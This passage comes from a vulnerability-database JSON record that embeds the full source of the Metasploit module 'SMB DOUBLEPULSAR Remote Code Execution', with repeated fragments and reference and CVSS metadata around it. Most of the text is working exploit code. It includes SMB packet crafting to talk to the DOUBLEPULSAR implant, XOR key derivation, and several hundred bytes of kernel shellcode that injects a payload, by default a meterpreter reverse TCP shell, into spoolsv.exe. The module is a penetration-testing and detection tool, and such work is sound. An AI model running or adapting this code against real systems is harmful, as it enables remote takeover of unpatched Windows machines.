\"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" 
\\\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\n 
\"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\n end\n\n def kernel_shellcode_size\n make_kernel_shellcode('').length\n end\n\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/smb/smb_doublepulsar_rce.rb", "title": "SMB DOUBLEPULSAR Remote Code Execution", "type": "metasploit", "viewCount": 61}, "differentElements": ["sourceData"], "edition": 22, "lastseen": "2020-03-28T22:11:20"}], "viewCount": 1079, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "zdt", "idList": ["1337DAY-ID-33313", "1337DAY-ID-27786", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27752"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", 
"RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700059.PRM", "700099.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0147", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96705", "SMNTC-96704", "SMNTC-96706", "SMNTC-96709", "SMNTC-96707", "SMNTC-96703"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0203", "CPAI-2017-0419", "CPAI-2017-0177", "CPAI-2017-0200", "CPAI-2017-0205", "CPAI-2017-0198"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104"]}, {"type": "threatpost", "idList": 
["THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2", "QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0145", "MS:CVE-2017-0143", "MS:CVE-2017-0148"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2020-10-03T19:20:37", "rev": 2}, "score": {"value": 8.1, "vector": "NONE", "modified": "2020-10-03T19:20:37", "rev": 2}}, "objectVersion": "1.5", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/smb/smb_doublepulsar_rce.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = GreatRanking\n\n include 
Msf::Exploit::Remote::SMB::Client\n include Msf::Module::Deprecated\n\n moved_from 'exploit/windows/smb/doublepulsar_rce'\n\n MAX_SHELLCODE_SIZE = 4096\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\n 'Description' => %q{\n This module executes a Metasploit payload against the Equation Group's\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\n\n While this module primarily performs code execution against the implant,\n the \"Neutralize implant\" target allows you to disable the implant.\n },\n 'Author' => [\n 'Equation Group', # DOUBLEPULSAR implant\n 'Shadow Brokers', # Equation Group dump\n 'zerosum0x0', # DOPU analysis and detection\n 'Luke Jennings', # DOPU analysis and detection\n 'wvu', # Metasploit module and arch detection\n 'Jacob Robles' # Metasploit module and RCE help\n ],\n 'References' => [\n ['MSB', 'MS17-010'],\n ['CVE', '2017-0143'],\n ['CVE', '2017-0144'],\n ['CVE', '2017-0145'],\n ['CVE', '2017-0146'],\n ['CVE', '2017-0147'],\n ['CVE', '2017-0148'],\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\n ],\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X64,\n 'Privileged' => true,\n 'Payload' => {\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\n 'DisableNops' => true\n },\n 'Targets' => [\n ['Execute payload (x64)',\n 'DefaultOptions' => {\n 'EXITFUNC' => 'thread',\n 'PAYLOAD' => 
'windows/x64/meterpreter/reverse_tcp'\n }\n ],\n ['Neutralize implant',\n 'DefaultOptions' => {\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'AKA' => ['DOUBLEPULSAR'],\n 'RelatedModules' => [\n 'auxiliary/scanner/smb/smb_ms17_010',\n 'exploit/windows/smb/ms17_010_eternalblue'\n ],\n 'Stability' => [CRASH_OS_DOWN],\n 'Reliability' => [REPEATABLE_SESSION]\n }\n ))\n\n register_advanced_options([\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\n ])\n deregister_options('SMB::ProtocolVersion')\n end\n\n OPCODES = {\n ping: 0x23,\n exec: 0xc8,\n kill: 0x77\n }.freeze\n\n STATUS_CODES = {\n not_detected: 0x00,\n success: 0x10,\n invalid_params: 0x20,\n alloc_failure: 0x30\n }.freeze\n\n def calculate_doublepulsar_status(m1, m2)\n STATUS_CODES.key(m2.to_i - m1.to_i)\n end\n\n # algorithm to calculate the XOR Key for DoublePulsar knocks\n def calculate_doublepulsar_xor_key(s)\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\n x & 0xffffffff # this line was added just to truncate to 32 bits\n end\n\n # The arch is adjacent to the XOR key in the SMB signature\n def calculate_doublepulsar_arch(s)\n s == 0 ? 
ARCH_X86 : ARCH_X64\n end\n\n def generate_doublepulsar_timeout(op)\n k = SecureRandom.random_bytes(4).unpack1('V')\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\n end\n\n def generate_doublepulsar_param(op, body)\n case OPCODES.key(op)\n when :ping, :kill\n \"\\x00\" * 12\n when :exec\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\n end\n end\n\n def check\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\n\n @tree_id = do_smb_setup_tree(ipc_share)\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\n vprint_status(\"Target OS is #{smb_peer_os}\")\n\n print_status('Sending ping to DOUBLEPULSAR')\n code, signature1, signature2 = do_smb_doublepulsar_pkt\n msg = 'Host is likely INFECTED with DoublePulsar!'\n\n case calculate_doublepulsar_status(@multiplex_id, code)\n when :success\n @xor_key = calculate_doublepulsar_xor_key(signature1)\n @arch = calculate_doublepulsar_arch(signature2)\n\n arch_str =\n case @arch\n when ARCH_X86\n 'x86 (32-bit)'\n when ARCH_X64\n 'x64 (64-bit)'\n end\n\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\n CheckCode::Vulnerable\n when :not_detected\n print_error('DOUBLEPULSAR not detected or disabled')\n CheckCode::Safe\n else\n print_error('An unknown error occurred')\n CheckCode::Unknown\n end\n end\n\n def exploit\n if datastore['DefangedMode']\n warning = <<~EOF\n\n\n Are you SURE you want to execute code against a nation-state implant?\n You MAY contaminate forensic evidence if there is an investigation.\n\n Disable the DefangedMode option if you have authorization to proceed.\n EOF\n\n fail_with(Failure::BadConfig, warning)\n end\n\n # No ForceExploit because @tree_id and @xor_key are required\n unless check == CheckCode::Vulnerable\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\n end\n\n case target.name\n when 'Execute payload (x64)'\n unless @xor_key\n fail_with(Failure::NotFound, 
'XOR key not found')\n end\n\n if @arch == ARCH_X86\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\n end\n\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\n\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\n\n print_status('Sending shellcode to DOUBLEPULSAR')\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\n when 'Neutralize implant'\n return neutralize_implant\n end\n\n case calculate_doublepulsar_status(@multiplex_id, code)\n when :success\n print_good('Payload execution successful')\n when :invalid_params\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\n when :alloc_failure\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\n else\n fail_with(Failure::Unknown, 'An unknown error occurred')\n end\n ensure\n disconnect\n end\n\n def neutralize_implant\n print_status('Neutralizing DOUBLEPULSAR')\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\n\n case calculate_doublepulsar_status(@multiplex_id, code)\n when :success\n print_good('Implant neutralization successful')\n else\n fail_with(Failure::Unknown, 'An unknown error occurred')\n end\n end\n\n def do_smb_setup_tree(ipc_share)\n connect(versions: [1])\n\n # logon as user \\\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\n\n # connect to IPC$\n simple.connect(ipc_share)\n\n # return tree\n simple.shares[ipc_share]\n end\n\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\n # make doublepulsar knock\n pkt = make_smb_trans2_doublepulsar(opcode, body)\n\n sock.put(pkt)\n bytes = 
sock.get_once\n\n return unless bytes\n\n # convert packet to response struct\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\n pkt.from_s(bytes[4..-1])\n\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\n end\n\n def make_smb_trans2_doublepulsar(opcode, body)\n setup_count = 1\n setup_data = [0x000e].pack('v')\n\n param = generate_doublepulsar_param(opcode, body)\n data = param + body.to_s\n\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\n simple.client.smb_defaults(pkt['Payload']['SMB'])\n\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\n param_offset = base_offset\n data_offset = param_offset + param.length\n\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\n\n @multiplex_id = rand(0xffff)\n\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\n\n pkt['Payload'].v['ParamCountTotal'] = param.length\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\n pkt['Payload'].v['ParamCountMax'] = 1\n pkt['Payload'].v['DataCountMax'] = 0\n pkt['Payload'].v['ParamCount'] = param.length\n pkt['Payload'].v['ParamOffset'] = param_offset\n pkt['Payload'].v['DataCount'] = body.to_s.length\n pkt['Payload'].v['DataOffset'] = data_offset\n pkt['Payload'].v['SetupCount'] = setup_count\n pkt['Payload'].v['SetupData'] = setup_data\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\n pkt['Payload'].v['Payload'] = data\n\n pkt.to_s\n end\n\n # ring3 = user mode encoded payload\n # proc_name = process to inject APC into\n def make_kernel_user_payload(ring3, proc_name)\n sc = make_kernel_shellcode(proc_name)\n\n sc << [ring3.length].pack('S<')\n sc << ring3\n\n sc\n end\n\n def generate_process_hash(process)\n # x64_calc_hash from 
external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\n proc_hash = 0\n process << \"\\x00\"\n\n process.each_byte do |c|\n proc_hash = ror(proc_hash, 13)\n proc_hash += c\n end\n\n [proc_hash].pack('l<')\n end\n\n def ror(dword, bits)\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\n end\n\n def make_kernel_shellcode(proc_name)\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\n # Length: 780 bytes\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\n generate_process_hash(proc_name.upcase) +\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" 
\\\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\n 
\"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\n end\n\n def kernel_shellcode_size\n make_kernel_shellcode('').length\n end\n\nend\n", "metasploitReliability": "", "metasploitHistory": "", "_object_type": "robots.models.metasploit.MetasploitBulletin", "_object_types": ["robots.models.metasploit.MetasploitBulletin", "robots.models.base.Bulletin"], "immutableFields": [], "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, 